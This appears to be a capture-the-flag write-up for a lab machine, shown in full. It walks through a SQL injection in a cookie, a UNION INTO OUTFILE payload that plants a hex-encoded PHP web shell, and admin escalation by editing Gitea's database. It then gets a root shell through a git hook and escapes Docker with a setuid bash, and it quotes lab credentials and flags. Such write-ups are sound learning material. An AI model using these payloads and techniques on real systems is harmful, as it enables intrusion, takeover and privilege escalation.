Enumeration#
Lets start with the simple nmap scan.
nmap -sVC 10.10.104.237
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 13:45 +0545
Nmap scan report for 10.10.104.237 (10.10.104.237)
Host is up (0.17s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:c9:dd:9b:db:95:9e:fd:19:a9:a6:0d:4c:43:9f:fa (RSA)
| 256 c3:fc:10:d8:78:47:7e:fb:89:cf:81:8b:6e:f1:0a:fd (ECDSA)
|_ 256 27:68:ff:ef:c0:68:e2:49:75:59:34:f2:bd:f0:c9:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Canis Queue
|_http-server-header: Apache/2.4.29 (Ubuntu)
843/tcp filtered unknown
1002/tcp filtered windows-icfw
1069/tcp filtered cognex-insight
1074/tcp filtered warmspotMgmt
2041/tcp filtered interbase
3367/tcp filtered satvid-datalnk
3690/tcp filtered svn
3809/tcp filtered apocd
7921/tcp filtered unknown
8654/tcp filtered unknown
9040/tcp filtered tor-trans
10566/tcp filtered unknown
10629/tcp filtered unknown
16992/tcp filtered amt-soap-http
24800/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds
Hmm lets check the port 80.
Hmm lets do directory busting. Hmmm nothing interesting there.
Lets try to do subdomain and vhost but the room hasn’t provided us with specific domain name.
Lets use nikto.
Hmm nothing useful i guess.
Exploit#
There is something on cookie.
Random strings.
Hmmm.
Is it like a hash or something.
Lets change that.
And something chnaged but why error? Does it need a fixed sized string or something. Lets try. But only error showed up.
I spend many time and got the hint of sql.
If server using query to determine the result by that value in cookie,then it might be vulnerable.
Okay but it was unexpected.
Lets try to exploit.
After many tries,we finally got right payload and without ;.
2ccffd5893d5c6ea78c8fd68813a773d' UNION SELECT 1,2-- -
Uff its so random. Okay lets enumerate the database.
I captured the request in caido to make it easy.
I was trying different thing like trying to tables,columns etc. and got this message.
Now I have a strong feeling that RCE can be possible. Lets try.
Foothold#
And I guess it worked.
2ccffd5893d5c6ea78c8fd68813a773d'UNION SELECT 1, 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php' -- -
Lets try to execute command.
Lets get reverse shell.
And now we are inside.
Lets see what can i do.
We got one password.
Hmm so there is use of git and gitea.
Privelege Escalation with Password Leak#
Lets see that work_analysis.
Hmm this is some kind log log file.
Lets see this might contain some creds.
And i guess we got it at first.
Lest try to login.
Ohh i thought it was dylanLabr4d0rs4L1f3 but it was only Labr4d0rs4L1f3.
THM{OTE3MTQyNTM5NzRiN2VjNTQyYWM2M2Ji}
Privelege Escalation and Docker Escape#
Now lets do privelege escalation.
Lets see that before git thing.
Hmm.
Running linpeas,we can see this.
Lets forward this port to our system by ssh.
ssh -L 3000:localhost:3000 dylan@ip
And now we can access it via http://localhost:3000 on our local machine.
Lets see what can we do.
I tried logging in with dylans email and password.
Email:dylan@yearofthedog.thm
Pass:Labr4d0rs4L1f3
(Email can be found in several git directories on the machine.)
But its also need a passcode.
Hmm is it any passcode stored there or anything like this. Lets see.
grep -Ri "passcode" .
Hmm something in ./gitea/log/gitea.log and ./gitea/gitea.db.
Lets check that out.
That log file has something but gitea.db has a lot.
Lets download the file via python server and use sqlite3.
We can do this to get tables.
.tables
And do this.
SELECT * FROM two_factor;
And we will get a token.
I also tried registering the user.
After that, I again downloaded the .db file and there is our user.
After few talk with chatGPT cause i am weak at using sqlite3,we can check the info of columns.
PRAGMA table_info(user);
So there is is_admin in 26th index.
Lets see the result of
SELECT * FROM user;
Or for more easy,
select lower_name,is_admin from user;
So here the user hack isn’t admin.
Lets change that to admin.
UPDATE user SET is_admin = 1 WHERE lower_name = 'hack';
So now user hack is admin.
Now lets replace that .db file from victim machine to ours new one.
scp gitea.db dylan@ip:/gitea/gitea/gitea.db
And now refreshing the page,we can see the administration page.
(I changed the username to hehe in upcoming cause the machine expired)
And there is a repo called test-repo.
Now we can exploit this.
.git/hooks/ directory of a repository, and they are executed when certain Git actions occur, such as git commit, git push, or git merge.)
-chatgpt
So if we could edit it we could run our script and that might give us with the root shell.
Lets see.
Lets add our rev shell here.
I will add 2-3 different reverse shells cause many some mightn’t work.
Now lets clone that repo in our victim’s machine to make that script run cause it automatically runs when any commit happens.
Lets do it.
git clone http://localhost:3000/Dylan/Test-Repo.git
cd Test-Repo/
echo "changes" >> README.md
git add .
git commit -m "changes"
git push
And we should now got the shell in listenner.
Hmm but this is a git shell.
Ohh but with root priveleges.
So we have now sudo to run anything as root.
And we are root but in docker.
Lets escape.
Cause we are in git shell,there might be something connected with main host.
Lets check that /app and /data.
And /data has same thing as main host.
And app also have gitea but something odd here.
Lets go on main host’s /gitea/gitea and do this.
cp /bin/bash .
Now from that another docker as root on `/data/gitea,
chown root:root bash
chmod 4777 bash
Now we can go to the main host and there will be bash with setuid of root.
And we are root.
THM{MzlhNGY5YWM0ZTU5ZGQ0OGI0YTc0OWRh}
Done#
And done.
Learned lots of things again. I hope you are doing great. Take care :).
Refs: revshell.com full tty shell